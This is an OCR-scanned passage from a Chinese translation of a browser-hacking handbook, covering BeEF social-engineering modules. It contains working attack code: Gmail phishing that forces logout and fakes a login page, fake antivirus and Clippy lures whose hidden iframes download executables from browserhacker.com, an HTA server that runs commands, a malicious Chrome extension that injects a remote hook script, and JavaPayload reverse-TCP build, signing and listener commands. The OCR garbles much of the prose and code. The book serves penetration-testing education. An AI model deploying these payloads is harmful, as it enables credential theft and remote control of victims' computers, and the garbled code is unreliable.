针对 未 提 到 的 其 他 网 站 ， 此 模块 还 提供 了 一 个 通用 的 模板 ， 该 模板 允许 自 定 义 对 话 框 中 的 
图 像 。 

该 模块 还 使 用 了 一 个 类 似 的 背景 渐 暗 模式 的 对 话 框 。 此 外 该 模块 在 运行 时 会 新 建 一 个 定时 
人 局 ， 用 以 循环 不 停 地 监控 用 户 名 和 密码 的 变更 。 图 5-14 展 示 了 带 有 BeEFesque 通 用 标志 的 模块 ， 
图 5-15 则 展示 了 专用 于 攻击 Facebook 的 模板 。 你 可 以 在 https://browserhacker.com 找 到 该 模块 完整 
的 代码 。 
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Your session has timed out! 


For your security, your session has been timed out. To 
ontinue browsing this site, please re-enter your username and 
password below. 
Username: 
Password: 











图 5-14 Pretty Theft 模 块 的 通用 模板 














6 OO / Spectr - The Browser Explo x i 


e CL} beefproject.com 


Facebook Session Timed Out 
Your session has timed out due to inactivity. 


Please re-enter your username and password to login. 








图 5-15 Pretty Theft 模 块 的 Facebook 模 板 


3. Gmail 钓鱼 

这 类 动态 的 、 瞬 人 式 的 网 络 钓鱼 攻击 自然 不 会 放 过 Gmail。2012 年 6 月 ，Google 的 邮箱 服务 以 
惊人 的 4.25 亿 用 户 量 ， 取 代 Hotmail 成 为 了 最 流行 的 在 线 邮 件 平 台 《〈 虽 然后 者 也 取得 了 3.6 亿 的 成 
绩 )”。 如 此 大 的 用 户 量 自然 吸引 了 很 多 攻击 者 的 关注 ，Gmail Phishing 模 块 也 就 应 运 而 生 。 由 @ 
floyd_ch 开 发 的 这 个 BeEF 模 块 , 与 之 前 介绍 过 的 其 他 模块 具有 许多 相似 之 处 , 但 在 执行 中 也 存在 
一 定 的 差异 。 该 模块 在 首次 启动 时 会 执行 以 下 代码 : 

document.title = "Google Mail: Email from Google"; 

beef .browser.changeFavicon("https://mail.google.com/favicon.ico"); 


logoutGoogle(); 
displayPhishingSite(); 


搭建 钓鱼 环境 分 为 两 步 : 首先 更 新 当前 文档 的 标题 ， 然 后 将 页 面 的 图 标 更 新 为 Google 的 
favicon.ico 文 件 。logoutGoogle() 函数 的 功能 是 循环 向 Google 发 起 退出 登录 的 请 求 ， 该 请 求 
并 不 会 引起 防御 XSRF 控 制 措 施 的 注意 ， 所 以 很 方便 踢 掉 当前 在 线 的 用 户 。 通 过 这 样 的 请 求 ， 
既 可 以 强制 当前 在 线 的 用 户 下 线 ， 也 能 够 让 他 们 无 法 重新 登录 。 随 后 displayPhishing- 
site() 函数 就 会 利用 伪造 的 信息 自 改 当前 页 面 的 document .body 元 素 ， 如 图 5-16 所 示 。 
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© O O Mocoogle Mail: Email from © x 


€ G www.beefproject.com 


Google E aue d 


Google Mail 

A Google approach to email. Sign in 
Google Mail is built on the idea that email can be more intuitive, efficient, and useful Ure 
And maybe even fun. After all, Google Mail has. 


Lots of space Password 
Over 2757.272164 megabytes (and counting) of free storage. 


Less spam 
Keep unwanted messages out of your inbox 


Mobile access 
Get Google Mail on your mobile phone. Leam more 


About Google Mail New features! Switch to Google Mail Create an account 


Take Google Mail to work with Google Apps 
for Business 


Love Google Mail, but looking for a custom email address for your 
company? 
Get business email, calendar, and online docs @your_company.com. Leam more 








图 $-16 ”Gmail 钓鱼 


当 用 户 在 这 个 伪造 的 登录 界面 中 输入 登录 信息 时 ， 该 模块 会 将 这 些 信息 送 回 BeEF 服 务 器 ， 
尝试 打开 一 个 新 窗口 用 于 勾 连 BeEF , B c 由 于 之 前 使 用 了 
登 出 逻辑 ， 用 户 会 回 到 Google 的 登录 界面 ， 此 界面 与 我 们 之 前 伪造 的 界面 相同 ， 从 而 使 用 户 误 以 
为 他 们 因为 输 错 了 登录 信息 而 再 次 回 到 这 里 。 此 逻辑 的 代码 片段 如 下 : 


window.open(http://browserhacker.com/rehook.html); 
window.focus(); 
window.location - "https://accounts.google.com/ServiceLoginAuth"; 


要 找到 该 模块 完整 的 代码 ， 你 可 以 访问 https://browserhacker.com， 或 Wiley 的 网 站 www.wiley. 
com/go/browserhackershandbook o 

4. 伪造 软件 更 新 

当 我 们 向 特定 的 目标 组 织 发 起 攻击 时 , 通常 需要 跳出 浏览 器 的 范围 ,直接 侵入 其 电脑 。 为 了 
达到 此 目标 ， 我 们 可 能 首先 需要 利用 目标 用 户 的 信任 。 

安全 专家 们 ( 当然 , 包括 本 书 作者 在 内 ) 经 党 向 那些 不 具有 太 多 安全 防范 能 力 的 受众 ， 灌 输 
保持 软件 更 新 的 重要 性 , 特别 是 需要 及 时 安装 重要 的 安全 补丁 。 但 在 现实 情况 下 ,这 些 事前 防御 
通常 显得 力不从心 , 尤其 是 在 面 对 一 些 零 日 漏洞 时 。 在 很 多 情况 下 ， 即 使 是 面 对 一 些 不 安全 的 软 
件 升 级 提示 ， 用 户 也 会 不 假 思 索 地 按 下 “安装 ”或 者 OK 键 。 我 们 所 要 做 的 只 是 充分 利用 用 户 对 

于 “简单 地 处 理 电脑 安全 问题 ”的 淘 望 ， 因 为 这 些 信 任 不 仪 会 为 我 们 打开 通 往 目 标 电脑 的 大 门 ， 
a EB 为 我 们 指引 一 条 坦途 。 

犯罪 分 子 通常 采用 相同 的 方法 , 传播 虚假 安全 软件 或 者 恶意 软件 。 例如， 在 用 户 的 电脑 上 弹 

一 个 对 话 框 ,提示 用 户 他 们 的 安全 软件 已 经 过 期 , 需要 升级 到 最 新 版 本 。 当 然 , 这 个 所 谓 的 新 
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版 本 根本 不 是 它 描述 的 那样 , 它 通常 携带 








们 的 支付 信息 ， 该 骗局 即 宣告 成 功 。 


带 恶意 
TH io J 


软件 或 要 求 付费 的 伪造 杀毒 软件 。 一 旦 用 户 提交 他 











有 时 候 , 为 了 让 虚假 的 升级 对 话 和 
来 淡化 屏幕 其 他 部 分 的 存在 。 下 面 的 
{ 


function grayOut (vis) 


var dark-document.getElementById( 





EE 获取 足够 的 注意 ,我 们 可 以 使 用 模 态 的 全 屏 对 话 框 或 窗口 ， 
JavaScript 困 数 可 以 实现 此 逻辑 : 


'darkenScreenObject' 


); 


if (!dark) ( 

var tbody = document.getElementsByTagName ("body") [0]; 

var tnode = document.createElement ('div'); 
tnode.style.position='absolute'; 
tnode.style.top-'Opx'; 
tnode.style.left-'Opx'; 
tnode.style.overflow-'hidden'; 
tnode.style.display-'none'; 
tnode.id-'darkenScreenObject'; 


tbody.appendChild(tnode); 


dark-document.getElementById( 


} 
if (vis) { 
var opacity 


var opaque 


905 








filter='alpha(opacity='+opacity+' 


'darkenScreenObject' 


ks 


(opacity / 100); 


)'s 


dark.style.opacity-opaque; 
dark.style.MozOpacity=opaque; 
dark.style. 
dark.style.zIndex=100; 
dark.style.backgroundColor='#000'; 
dark.style.width-'100$'; 
dark.style.height-'100$2'; 
dark.style.display='block'; 

} else { 


dark.style.display='none'; 


} 
j 
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MT orayout (true) 时 ， 一 个 不 透明 度 为 70% 的 黑色 元 素 将 会 填充 整个 屏幕 ， 从 而 使 得 
被 焉 住 的 部 分 呈现 出 一 种 变 暗 的 效果 。 当 执行 gsrayout (false) Mt, W cen eg 属性 会 
改 回 为 none， 从 而 再 将 该 元 素 隐藏 。 

接 下 来 的 函数 用 于 在 黑色 背景 元 素 之 上 显示 一 个 伪造 的 杀毒 软件 图 片 : 





function avpop() 
avdiv 
avdiv.se 


{ 


tAttribute ( 

avdiv.setAttribute( 
top:50$; left:50% 
z-index:101'); 

tAttribute( 


i 
'style', 


avdiv.se 'align', 
document 
avdiv.innerHTML- 


src=\'ht 








document .createElement (' 
'avpop' 


; margin- 





div'); 

); 
'width:754px;height:488px;position:fixed; 
left: -377px; margin-top: -244px; 
"center" 


); 


.body.appendChild(avdiv) ; 
'<br><img id=\'avclicker\' 
tp://browserhacker.com/avalert.png\' 


/SS 
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当 执行 avpop O 函数 时 , 该 函数 会 在 当前 的 黑色 背景 之 上 创建 一 个 新 元 素 , 其 中 只 有 一 张 图 
片 。 通 过 给 该 图 片 附加 一 个 点 击 处 理 程序 ， 便 可 以 完成 这 个 循环 : 


Sj ('#avclicker').click(function(e) { 




















var div = document.createElement ("div"); 

div.id = "download"; 

div.style.display = "none"; 

div.innerHTML= 
"<iframe src='http://browserhacker.com/bad_executable.exe' 
width=1 height=1 style='display:none'></iframe>"; 


document .body.appendChild(div) ; 


Sj ('#avpop') .remove(); 
grayOut (false); 
)); 


当 用 户 点 击 伪 造 的 杀毒 软件 图 片 时 ， 会 自动 加 载 一 个 隐藏 的 IFrame ， 并 开始 从 http:/bro- 
wserhacker.comy/bad_executable.exe 下 载 可 执行 程序 。 接 着 删除 前 面 伪造 的 弹出 对 话 框 以 及 黑色 青 
景 ， 从 而 使 页 面 跳 回 之 前 的 界面 。 当 然 ， 这 种 方法 有 一 个 显而易见 的 限制 : 该 方法 只 能 做 到 诱骗 
用 户 下 载 可 执行 程序 。 

除 前 例 中 的 诱导 用 户 下 载 程序 外 ,如 果 被 攻击 的 浏览 器 恰好 是 正 , 那么 我 们 还 可 以 诱导 用 户 
运行 HTML 应 用 (HTA) ”。 简 而 言 之 ,，HTA 包 含 了 焉 的 所 有 功能 ， 但 是 不 包含 用 户 界面 ， 同 时 
不 会 执行 严格 的 安全 模型 。 例如， 在 运行 HTA 应 用 时 ,安全 区 域 会 被 忽略 。 我 们 可 以 轻松 地 入 侵 
用 户 的 文件 系统 ,访问 注册 表 ， 其 至 执行 命令 。 因 此 ， 早 在 2007 年 和 2008 年 ，HTA 应 用 就 已 经 开 
始 被 不 怀 好 意 的 攻击 者 广泛 采用 ”。, 但 令 人 震惊 的 是 ,直到 现在 仍然 能 在 最 新 版 本 的 正中 见 到 HTA 
的 身影 ， 这 也 就 为 我 们 的 攻击 提供 了 一 个 非常 有 效 的 武器 。 

下 面 的 代码 是 一 个 由 Ruby 写 的 简易 的 Web 服 务 器 ， 提 供 一 个 小 的 HTA 应 用 : 


require 'rubygems' 
require 'thin' 
require 'rack' 




































































require 'sinatra' 


class Hta « Sinatra::Base 
before do 
content type 'application/hta' 
end 


get "/application.hta" do 


"<script>new ActiveXObject('WScript.Shell')" + 
" Run('calc.exe')</script>" 
end 

end 

@routes { 


nyo 


> Hta.new 


} 
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@rack_app = Rack: 


:URLMap.new(Groutes) 


Gthin = Thin::Server.new("browserhacker.com", 4000, Grack app) 


Thin::Logging.sil 


ent - false 


Thin::Logging.debug - true 


puts "[#{Time.now 
Gthin.start 


)] Thin ready" 


当 用 户 被 诱导 打开 http://browserhacker.com:4000/application.hta 后 ， 他 们 会 收 到 图 5-17 所 示 的 


警告 对 话 框 。 


图 5-17 的 界面 容易 使 人 误 以 为 该 HTA 是 由 微软 公司 开发 的 ， 尽管 事实 并 非 如 此 。 而 且 在 该 敬 











告 对 话 框 中 并 未 显示 任何 与 文件 来 源 有 关 的 信息 ， c n T 在 
此 例 中 ， 获 得 用 户 允 许 后 ,该 HTA 便 开始 运行 ， 继 而 调 起 calc.exe。 更 多 先进 的 攻击 实例 参见 


browserhacker.com. 


€ k. (y) http://browserhacker.com:4000/application.hta A ~ BOY O browserhacker.com 


Internet Explorer Security 





A website wants to open web content using this 
program on your computer 
This program will open outside of Protected mode. Internet Explorer's 


Protected mode helps protect your computer. If you do not trust this 
website, do not open this program. 








T| Name: Microsoft (R) HTML Application host 
Hi | publisher: — Microsoft Windows 








[E] Do not show me the warning for this program again 

















图 5-17 HTAES 





一 种 有 效 的 攻击 方法 是 制作 一 个 可 以 自动 安装 的 浏览 器 扩展 , 但 这 也 取决 于 目标 浏览 器 等 具 





体 情 况 。 但 最 终 为 了 能 运行 扩展 ， 你 可 能 还 需要 在 目标 浏览 器 中 执行 以 下 的 JavaScript 代 码 : 


grayOut (true); 
avpop(); 





BeEF 的 Fake AV 模 块 提供 了 同样 的 逻辑 ， 而 且 该 模块 运行 时 ， 目 标 用 户 会 看 到 类 似 于 图 $-18 


中 的 界面 。 
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99 AntivirusPCSuite 


Antivirus, Antispyware, ol 
Firewall & Popup Blocker ias 


Is System Status: Your system is in danger 


The tems in red requie immediate action.. Select an tem from the fst below to get more information 
[s system scan and take the action recommended 
7 


E virus Protection Active P System Scan 


图 Quarantine Erde tras —MÓÓ€ Keep your system free from 


iruses, spyware and popups now. 
x Advanced Tools E system Firewall Active 


ó Scan My System! © 
Spyware Protection Active 


» More Scan options 


a Popup Blocker 


| Message Center 
E Threats Database : 


Your system is in danger as some 
E3 Automatic update Inactive harmful threats are detected in 
your system, Perform some 
action wth threats to protect 
your system, 
@svstem Scan History 2 system scan(s) completed 
PEL » Launch Active Threats 








图 $-18 ”伪造 的 杀毒 软件 弹 窗 


BeEF 提 供 了 另 一 个 社会 工程 学 模块 ， 就 是 FakeFlash Update。 有 别 于 简单 地 诱导 用 户 下 载 可 
执行 程序 ， 该 模块 会 试图 强迫 用 户 安装 一 个 恶意 的 浏览 器 扩展 ( 如 图 5-19、 图 5-20、 图 5-21 及 图 


5-22 所 示 ) 在 这 种 情况 下 , 该 恶意 扩展 设置 并 执行 一 个 反 向 连接 的 Meterpreter 单 元 。 我 们 将 会 在 
第 7 章 中 着 重 介绍 扩展 的 相关 内 容 ， 所 以 在 这 里 不 再 详细 展开 。 








NWC - Search 








Search 


<script src=http://127.0 
[A] An update to Adobe® Flash® Player is available 


This update includes: 
Could not find anything when searching for 


Improved video performance for smooth, high-quality playback 
* Improved performance and compatibility 
* Security enhancements described in this Security Bulletin 


‘Seo details... 


Updating takes under a minute on broadband - no restart is required. 





图 $-19 ”伪造 的 Flash 对 话 框 





出 
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一 旦 用 户 点 击 了 Install 按 钮 ，Firefox 就 会 弹出 一 个 类 似 于 图 5-20 的 警告 对 话 框 。 


Mozilla Firefox 























[Je $ about:blank 


Firefox prevented this site 
(www.insecurelabs.org) from asking you to 
install software on your computer. 


{allow |>) 











图 5-20 Firefox E VE S HI 


该 警告 对 话 框 并 不 会 只 出 现 一 次 。 如 果 用 户 继续 点 击 Allow 按 钮 ， 另 一 个 安装 确认 对 话 框 就 
会 弹出 ， 如 图 5-21 所 示 。 





TH 


Mozilla Firefox 


; Install add-ons only from authors whom you trust. 
Pi Malicious software can damage your computer or violate your privacy. 


You have asked to install the following item- 


Link Target Finder | (Author not verified) 
http://127.0.0.1:3000/api/ipec/ff extension. 








图 $-21 ”Firefox 进 一 步 安装 确认 对 话 框 


在 用 户 最 终点 击 Install Now 按 钮 后 , 该 恶意 扩展 程序 就 会 进行 安装 , 并 提示 用 户 重 启 浏览 器 ， 
如 图 5-22 所 示 。 


Link Target Finder will be installed after you 
restart Firefox. 


Restart Now | ~ 


You can access your add-ons on all your devices * 
CQ. wn Sync. Learn More 





图 5-22 重启 提示 对 话 框 
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基于 Firefox 扩 展 的 病毒 植 入 器 

BeEF 还 提供 了 一 个 Firefox Extension Dropper 模 块 , 可 以 用 来 做 社会 工程 学 评估 或 者 白 帽 子 
测试 。 该 扩展 庶 入 了 一 个 恶意 程序 ,会 在 用 户 允许 扩展 安装 时 执行 。 

此 外 ， 如 Michael Schierl 所 言 ， 由 于 此 类 攻击 使 用 了 自 引导 型 扩展 ， 因 此 无 论 用 户 在 安装 
扩展 后 是 否 重 启 浏览 器 ， 该 模块 的 攻击 力 都 不 会 受到 影响 。 

由 于 Firefox 有 是 唯一 一 个 可 能 受到 此 类 攻击 的 浏览 器 ， 所 以 你 可 能 想 让 这 个 模块 自动 运行 。 
这 样 ， 只 要 用 户 的 浏览 器 被 攻陷 ， 用 户 就 会 收 到 安装 该 恶意 扩展 的 提示 。 


E 
TN 








从 前 面 的 图 示 中 你 应 该 不 难 发 现 ， 该 模块 的 主要 攻击 目标 是 Firefox 浏 览 句 。 不 过 ，Chrome 
用 户 也 不 会 幸免 ， 因 为 该 模块 同样 设计 了 针对 Chrome 浏 览 絮 的 可 选 payload。 

自从 Chrome 更 新 到 20 版 后 ， 就 无 法 再 从 除 Google Chrome 应 用 商店 之 外 的 渠道 安装 Chrome 
扩展 了 。 然 而 ，Luca Carettoni 和 Michele Orrd 的 研究 找到 了 一 种 解决 办 法 ”。 他 们 发 现 ，Google 
并 没有 分 析 和 检查 应 用 商店 中 已 上 架 的 扩展 是 否 存在 恶意 代码 或 者 后 门 。 这 个 扩展 可 以 通过 窃 
取 用 户 cookie ( 甚至 包括 标记 了 HttpOnly 的 cookie )， 从 而 获得 该 用 户 在 www.meraki.com 云 门户 
的 登录 权限 。 

图 5-23 显 示 了 已 在 Chrome 应 用 商店 上 架 的 恶意 扩展 。 


m 


























Overview - Meraki Dashbos ~= Cambria X. æ Chrome Web Store - Adoi 


c chrome.google.com/webstore / detail /adobe-flash-player-securi/keiahmohbbeekncdkafifenodhbgjplm x 


wA T DINEM 
Adobe Flash Player Security Update ' ENTENDU 


OVERVIEW DETAILS REVIEWS RELATED 








图 $-23 ”恶意 Chrome 扩 展 








该 恶意 Chrome 扩 展 由 几 幅 图 片 、manifest.json 与 background.js 文 件 组 成 。manifest.json 内 容 
如 下 : 
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"name": "Adobe Flash Player Security Update", 
"manifest_version": 2, 
‘version ys "11,.5,502.149", 
"description": 
"Updates Adobe Flash Player with latest security updates", 
"background": { 
"scripts": ["background.js"] 
For 
"content_security_policy": 
"script-src 'self' 'unsafe-eval' https://browserhacker.com; 
object-src 'self'", 
"icons": { 
"l5": "Iconl6.phg", 
"A8": “Leonds png", 
"128": "lconl28.png" 


"permissions": [ 
"Labs" 
"BREtp:/ m, 
"https://*/*", 
"file://*/*", 
"cookies" 

] 

j 


background.jsV Zi ll F : 


d=document ; 

e=d.createElement ('script'); 
e.src="https://browserhacker.com/hook.js"; 
d.body.appendChild(e); 


manifest,json 文 件 中 的 背景 元 素 表明 ，background,js 文 件 会 在 该 扩展 启动 时 执行 。 
background.js 会 在 当前 文档 中 创建 一 个 新 的 脚本 元 素 ， 并 指向 BeEF 的 勾 连 脚本 。 由 于 该 扩展 在 
浏览 器 中 运行 ， 并 可 以 控制 所 有 的 标签 页 ， 所 以 当 用 户 启动 Chrome 时 ， 浏 览 器 中 的 各 种 操作 都 
在 我 们 的 掌控 之 中 。 
恶意 浏览 器 扩展 正 广泛 用 于 不 良 的 目的 。 第 一 个 被 媒体 报道 的 此 类 攻击 ， 是 关于 针对 巴西 
Facebook 用 户 的 Firefox 以 及 Chrome 恶 意 扩 展 *。 第 7 章 将 介绍 更 多 关于 浏览 器 扩展 的 细节 。 

5. 使 用 Clippy 

微软 的 Office 助 手 ， 我们 更 多 地 叫 它 Clippy ( 大 眼 夹 )， 是 微软 开发 的 一 款 骨 在 帮助 用 户 更 好 
地 使 用 Office 的 智能 助手 概念 产品 。 然 而， 自 1997 年 发 布 以 来 , 它 给 毫 无 戒心 的 Office 用 户 带 来 了 
无 数 的 麻烦 。 例 如 ， 在 用 户 新 建 一 个 文档 时 ，Clippy 便 会 弹出 ， 并 “智能 ”询问 一 系列 问题 。 可 
怜 的 Clippy 因 此 受到 了 包括 微软 员工 在 内 的 无 数 用 户 的 吐 柳 ， 并 最 终 在 Office 2007 中 正式 退役 ”7。 

Nick Freeman 和 Denis Andzakovic 舍 不 得 同 Clippy 告 别 , 为 此 他 们 开发 了 Clippy 模 块 作为 纪念 。 
Avery Brooks 在 他 的 Heretic Clippy 项 目 中 ,创建 了 此 模块 的 原始 代码 ， 可 以 从 
http://clippy.ajbnet.conmy/ 获 取 。 该 模块 完全 使 用 JavaScript 在 浏览 器 内 创造 了 一 个 可 配置 的 Clippy。 



















































































53 ”社会 工程 学 175 








默认 情况 下 ， 该 模块 通常 被 用 来 诱骗 用 户 下 载 一 个 可 执行 文件 。 

这 个 Clippy 模 块 的 高 度 模块 化 构建 方式 ,决定 了 其 无 论 是 在 部 署 还 是 使 用 时 都 具有 非常 大 的 
灵活 性 。Clippy 的 核心 是 Clippy 控 制 器 , 这 个 控制 需 提 供 了 默认 配置 , 以 及 Clippy 和 其 对 话 框 在 浏 
览 器 底部 角落 中 的 显示 位 置 。 你 可 以 在 Clippy 控 制 需 的 run () 方 法 中 ， 添 加 任意 多 个 HelpText 
对 象 ， 而 Clippy 在 每 次 启动 时 会 随机 弹出 其 中 的 一 个 。run() 方 法 还 负责 生成 ClippyDisplay 
对 象 并 淡 入 显示 。 

实现 这 个 功能 的 代码 如 下 : 


Clippy.prototype.hahaha = function() { 
var div = document.createElement ("div"); 











var _c = this; 
div.id = "heehee"; 
div.style.display = "none"; 


div.innerHTML="<iframe src='http://browserhacker.com/calc.exe' 
width=1 height=1 style='display:none'></iframe>"; 


document.body.appendChild (div); 
c.openBubble("Thanks for using Clippy!"); 


setTimeout (function () { c.killClippy(); }, 5000); omm 
} 


调用 _c .openBubble ( 函数 弹出 一 个 PopupDisplay 对 话 框 ， 看 起 来 像 是 Clippy 叶 了 个 泡 泡 。 
而 当 我 们 在 ron ( ) 方 法 中 搬入 HelpText 对 象 时 ,可 以 调用 _c.killclippy() 函数 , 该 函数 用 来 
关闭 Clippy。 以 下 是 一 个 范例 : 
var Help = new HelpText ("Would you like to update your browser?"); 
Help.addResponse("Yes",function() { _c.hahaha(); }); 


Help.addResponse("Not now", function() { 
_¢c.killClippy(); 





























setTimeout(function() { 
new Clippy().run(); 
j, 5000); 


Ey 
this.addHelp(Help,true); 


Helpb 这 个 HelpText 对 象 包 括 了 一 个 默认 问题 以 及 两 个 答案 。 如 果 用 户 选择 Yes， 程 序 会 调 
用 hahaha () 函数 ; 如 果 用 户 选择 Not now， 则 Clippy 会 关闭 并 在 $ 秒 后 重启 。this.aqqHelp () 
函数 则 用 来 向 Clippy 中 添加 Help 对 象 ， 它 允许 我 们 向 Clippy 的 列表 中 添加 任意 多 个 问题 。 图 5-24 
展示 了 激活 时 的 Clippy。 
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penetration testing tool that focuses on the web browser. 





Amid growing concerns about web-borne attacks against 
clients, including mobile clients, BeEF allows the professional 
penetration tester to assess the actual security posture of a 
target environment by using client-side attack vectors. Unlike 
other security frameworks, BeEF looks past the hardened 
network perimeter and client system, and examines 
exploitability within the context of the one open door: the web 
browser. BeEF will hook one or more web browsers and use 
them as beachheads for launching directed command 
modules and further attacks against the system from within 
the browser context. 


Contribute to BeEF 
The BeEF project uses GitHub to 
repository. To checkout a read o 


git clone https://github.com/b 


To checkout a non-read only copy Or TO 
please refer to GitHub. 


a Development Mailling List 





图 5-24 ”激活 时 的 Clippy 


虽然 这 个 模块 肯定 会 让 人 觉得 有 些 好 笑 ， 但 事实 上 确实 有 不 少 人 会 被 Clippy 对 话 框 迷惑 ， 并 
在 收 到 软件 升级 通知 时 选择 同意 。 因 此 ， 该 模块 在 将 来 仍 有 可 能 被 用 于 向 用 户 电脑 安 装 程 序 。 
































5.3.4 ”使 用 经 过 签名 的 Java 小 程序 


经 过 前 面 的 学 习 , 你 已 经 了 解 了 一 些 诱导 用 户 进行 操作 的 方法 ,其 中 包括 使 用 虚假 的 登录 提 
示 等 钓鱼 手段 , 以 尝试 诱骗 用 户 泄 露 敏 感 信息 。 男 一 个 常见 的 技术 就 是 尝试 诱导 用 户 运 行 恶 意 代 
码 ， 以 获取 在 浏览 器 外 运行 命令 的 权限 ( 比如 利用 经 过 签名 的 Java 小 程序 )。 这 些 攻 击 的 技术 方 
案 ， 我 们 会 在 第 8 章 详细 介绍 ， 但 抛 开 技术 不 看 ， 如 何 诱导 用 户 也 是 一 个 需要 我 们 关注 之 处 。 

于 2009 年 发 布 的 BeEF 模 块 Java Payload， 尝 试 在 当前 勾 连 的 浏览 器 会 话 中 加 载 一 个 经 过 签名 
的 Java 小 程序 。Java Payload 模 块 借助 TCP 的 反 向 连接 ， 加 载 到 用 户 勾 连 页 面 中 。 一旦 获得 用 户 的 
运行 许可 ， 该 模块 即 可 在 用 户 电脑 上 执行 任意 命令 。 我 们 曾 在 4.2.1 节 中 提 到 过 ，Java 目 前 仍 被 许 
多 大 型 企业 广泛 使 用 。 尽 管 此 类 攻击 需要 用 户 确认 才能 继续 ， 但 其 仍 是 补丁 完善 的 Java 用 户 的 较 
大 威胁 。 这 种 情况 也 得 到 了 信息 安全 部 门 的 关注 ， 他 们 反对 继续 使 用 此 类 Java 小 程序 ”。 图 5-25 
展示 了 当 用 户 执 行 BeEF 自 签名 的 Java 小 程序 时 ， 可 能 出 现 的 警告 对 话 框 。 
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4 @ beefproject.com C | | @) (图 - Google 
Most Visited ~ {_} Getting Started Latest Headlines ~ (^ Hook Me! 
© Disable» $00 OO Security Warning 











Do you want to run this application? 


Name: Microsoft 


A \ Publisher: UNKNOWN 


From: http://127.0.0.1:3000 


Risk: This application will run with unrestricted access which may put your computer and 
personal information at risk. Run this application only if you trust the publisher. 


More Information Linke Pl. 
Select the box below, then click Run to start the application 


M 1 accept the risk and want to run this application. 


@ Hide Options 
(| Always trust content from this publisher 


vaga 


66.569s - [Focus] Browser has regained focus 

68.6475 - [Blur] Browser has lost focus. 

50.103s - [Blur] Browser has lost focus. 

Hooked browser 127 0.0.1 has executed instructions from commar 


clients, including mobile clients, BeEF allows the professional 

penetration tester to assess the actual security posture of a 

target environment by using client-side attack vectors. Unlike 
thar sacurity frameworks ReFF lanks nast the hardened 


图 5-25” 自 签名 的 Java 小 程序 安全 对 话 框 


如 果 这 个 小 程序 经 过 Symantec 或 其 他 SSL 广 商 的 证 书签 名 ， 则 不 会 向 用 户 展示 上 述 安全 对 话 
框 。 所 以 ,购买 一 个 签名 证 书 无 疑 是 非常 值得 的 ， 这样 能 最 大 限度 地 减少 小 程序 触发 安全 警告 的 
可 能 性 。 对 恶意 代码 签名 ( 如 Windows 程 序 ) 的 后 果 ， 我 们 曾 在 5.3.3 节 讨论 过 。 

BeEF 依 赖 于 Michael Schierl 创 建 的 JavaPayload , 可 从 https://github.com/schierlm/JavaPayload 获 
取 。 下 载 完 成 后 ， 需 要 进行 编译 。 使 用 JavaPayload 的 一 个 好 处 是 ， 你 可 以 指定 攻击 的 方式 。 
JavaPayload 不 仅 可 以 被 编译 成 为 小 程序 , 也 可 以 被 编译 成 为 一 个 可 以 附加 到 现 有 Java 进 程 上 的 通 
用 代理 。 还 有 更 高 级 的 用 法 ,它们 可 能 会 在 一 些 特殊 场景 下 派 上 用 场 ， 比 如 OpenOffice BeanShall 
宏 (基于 Java ) 或 者 JDWP (Java Debug Wire Protocol，Java 调 试 通信 协议 ) 加 载 器 等 。 在 环境 搭 
建 完成 后 ， 可 以 使 用 如 下 命令 编译 有 效 载 答 : 

java -cp JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP 

上 述 命令 会 编译 生成 Applet ReverseTCPjar 文 件 ， 但 在 将 该 文件 发 送 给 目标 用 户 之 前 ， 我 们 
还 必须 对 它 进 行 签 名 。 为 了 演示 方便 ， 你 可 以 自行 签名 该 JAR 文 件 。 然 而 ， 正 如 前 文 所 述 ， 为 了 
减少 用 户 察觉 的 可 能 性 , 我 们 最 好 使 用 一 个 合法 的 证 书 进行 签名 。 执行 下 面 的 命令 可 以 生成 密 角 
文件 ， 接 着 我 们 用 它 为 JAR 文 件 签名 : 


keytool -keystore <keyfile> -genkey 
jarsigner -keystore <keyfile> Applet_ReverseTCP.jar mykey 


一 旦 该 小 程序 在 目标 电脑 上 开始 执行 ， 它 会 尝试 反 向 连接 攻击 者 的 设备 。 因 此 ,在 小 程序 在 
目标 电脑 中 运行 前 ， 我 们 需要 提前 打开 监听 器 。 使 用 如 下 命令 打开 监听 器 : 
























































Je 
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java -cp JavaPayload.jar javapayload.handler.stager.\ 
StagerHandler ReverseTCP «Listening IP>\ 
«Listening TCP Port» -- JSh 


Java Applet 模 块 依赖 于 BeEF 的 beef .dom.attachApplet () 函数 ,但 于 篇 幅 我 们 不 在 这 里 展 
开 介 绍 ， 你 可 以 在 https:/Wbrowserhackercom 查 看 代码 。 使 用 类 似 如 下 的 JavaScript 代 码 加 载 先前 创 
建 的 小 程序 : 


beef.dom.attachApplet (applet_id, 
applet_name, 
'javapayload.loader.AppletLoader', 


























null, 
applet archive, 
[f*argc':"'5', 


'arg0':'ReverseTCP', 

'argi':attacker ip, 

'arg2':attacker. port, 

argot =ar 

'arg4':'JSh'j] 

Je; 

这 个 函数 需要 以 下 几 个 参数 。 

O applet id: 一 个 随机 的 小 程序 标识 符 。 

O applet name: 一 个 随机 的 小 程序 名 字 ; 你 可 以 随意 起 名 ， 其 至 用 “Microsoft” 也 行 。 
口 applet_archive: 上 文中 创建 的 指向 Applet_ReverseTCP.jar 的 URL。 

口 attacker_ip: 监听 需 的 卫 地 址 。 

口 attacker_port: 监听 需 的 TCP 端 口 。 

为 了 提升 攻击 的 效果 , 尤其 是 应 付 可 能 会 出 现 的 Java 对 话 框 , 我 们 有 必要 花 些 心思 进行 优化 ， 
比如 加 入 一 些 具 有 迷惑 性 的 内 容 , 或 者 使 用 一 些 社会 工程 学 的 手段 等 。 这 看 起 来 好 像 很 复杂 , 其 
实 非 常 简单 ,例如 在 用 户 启动 时 弹出 一 个 伪造 的 对 话 框 :“ 非 常 抱歉 ,由 于 我 们 网 站 配置 的 变化 ， 
您 可 能 会 收 到 一 个 关于 小 程序 的 警告 对 话 框 , 这 是 正常 的 。 为 了 保证 您 能 正常 访问 该 页 面 , 请 您 
在 收 到 提示 时 选择 接受 。” 
























































基于 经 过 签名 的 小 程序 的 病毒 植 入 器 





如 果 JavaPayload 不 能 满足 你 的 需求 , 那 你 可 以 尝试 一 下 BeEF 的 Signed Applet Dropper 模 块 。 
它 与 前 面 提 到 的 Firefox Extension Dropper 的 原理 基本 相同 ,主要 的 区 别 在 于 当 目 标 用 户 允 许 该 
小 程序 (使 用 不 可 信 证 书签 名 ) 运行 时 ， 它 会 动态 下 载 病毒 植 入 器 并 开始 运行 。 病 毒 植 入 器 在 
运行 后 会 被 自动 删除 。 

该 植 入 程序 可 以 是 一 个 带 有 Meterpreter 后 门 的 程序 ,通过 HTTPS 或 DNS 通信 渠道 的 方式 发 
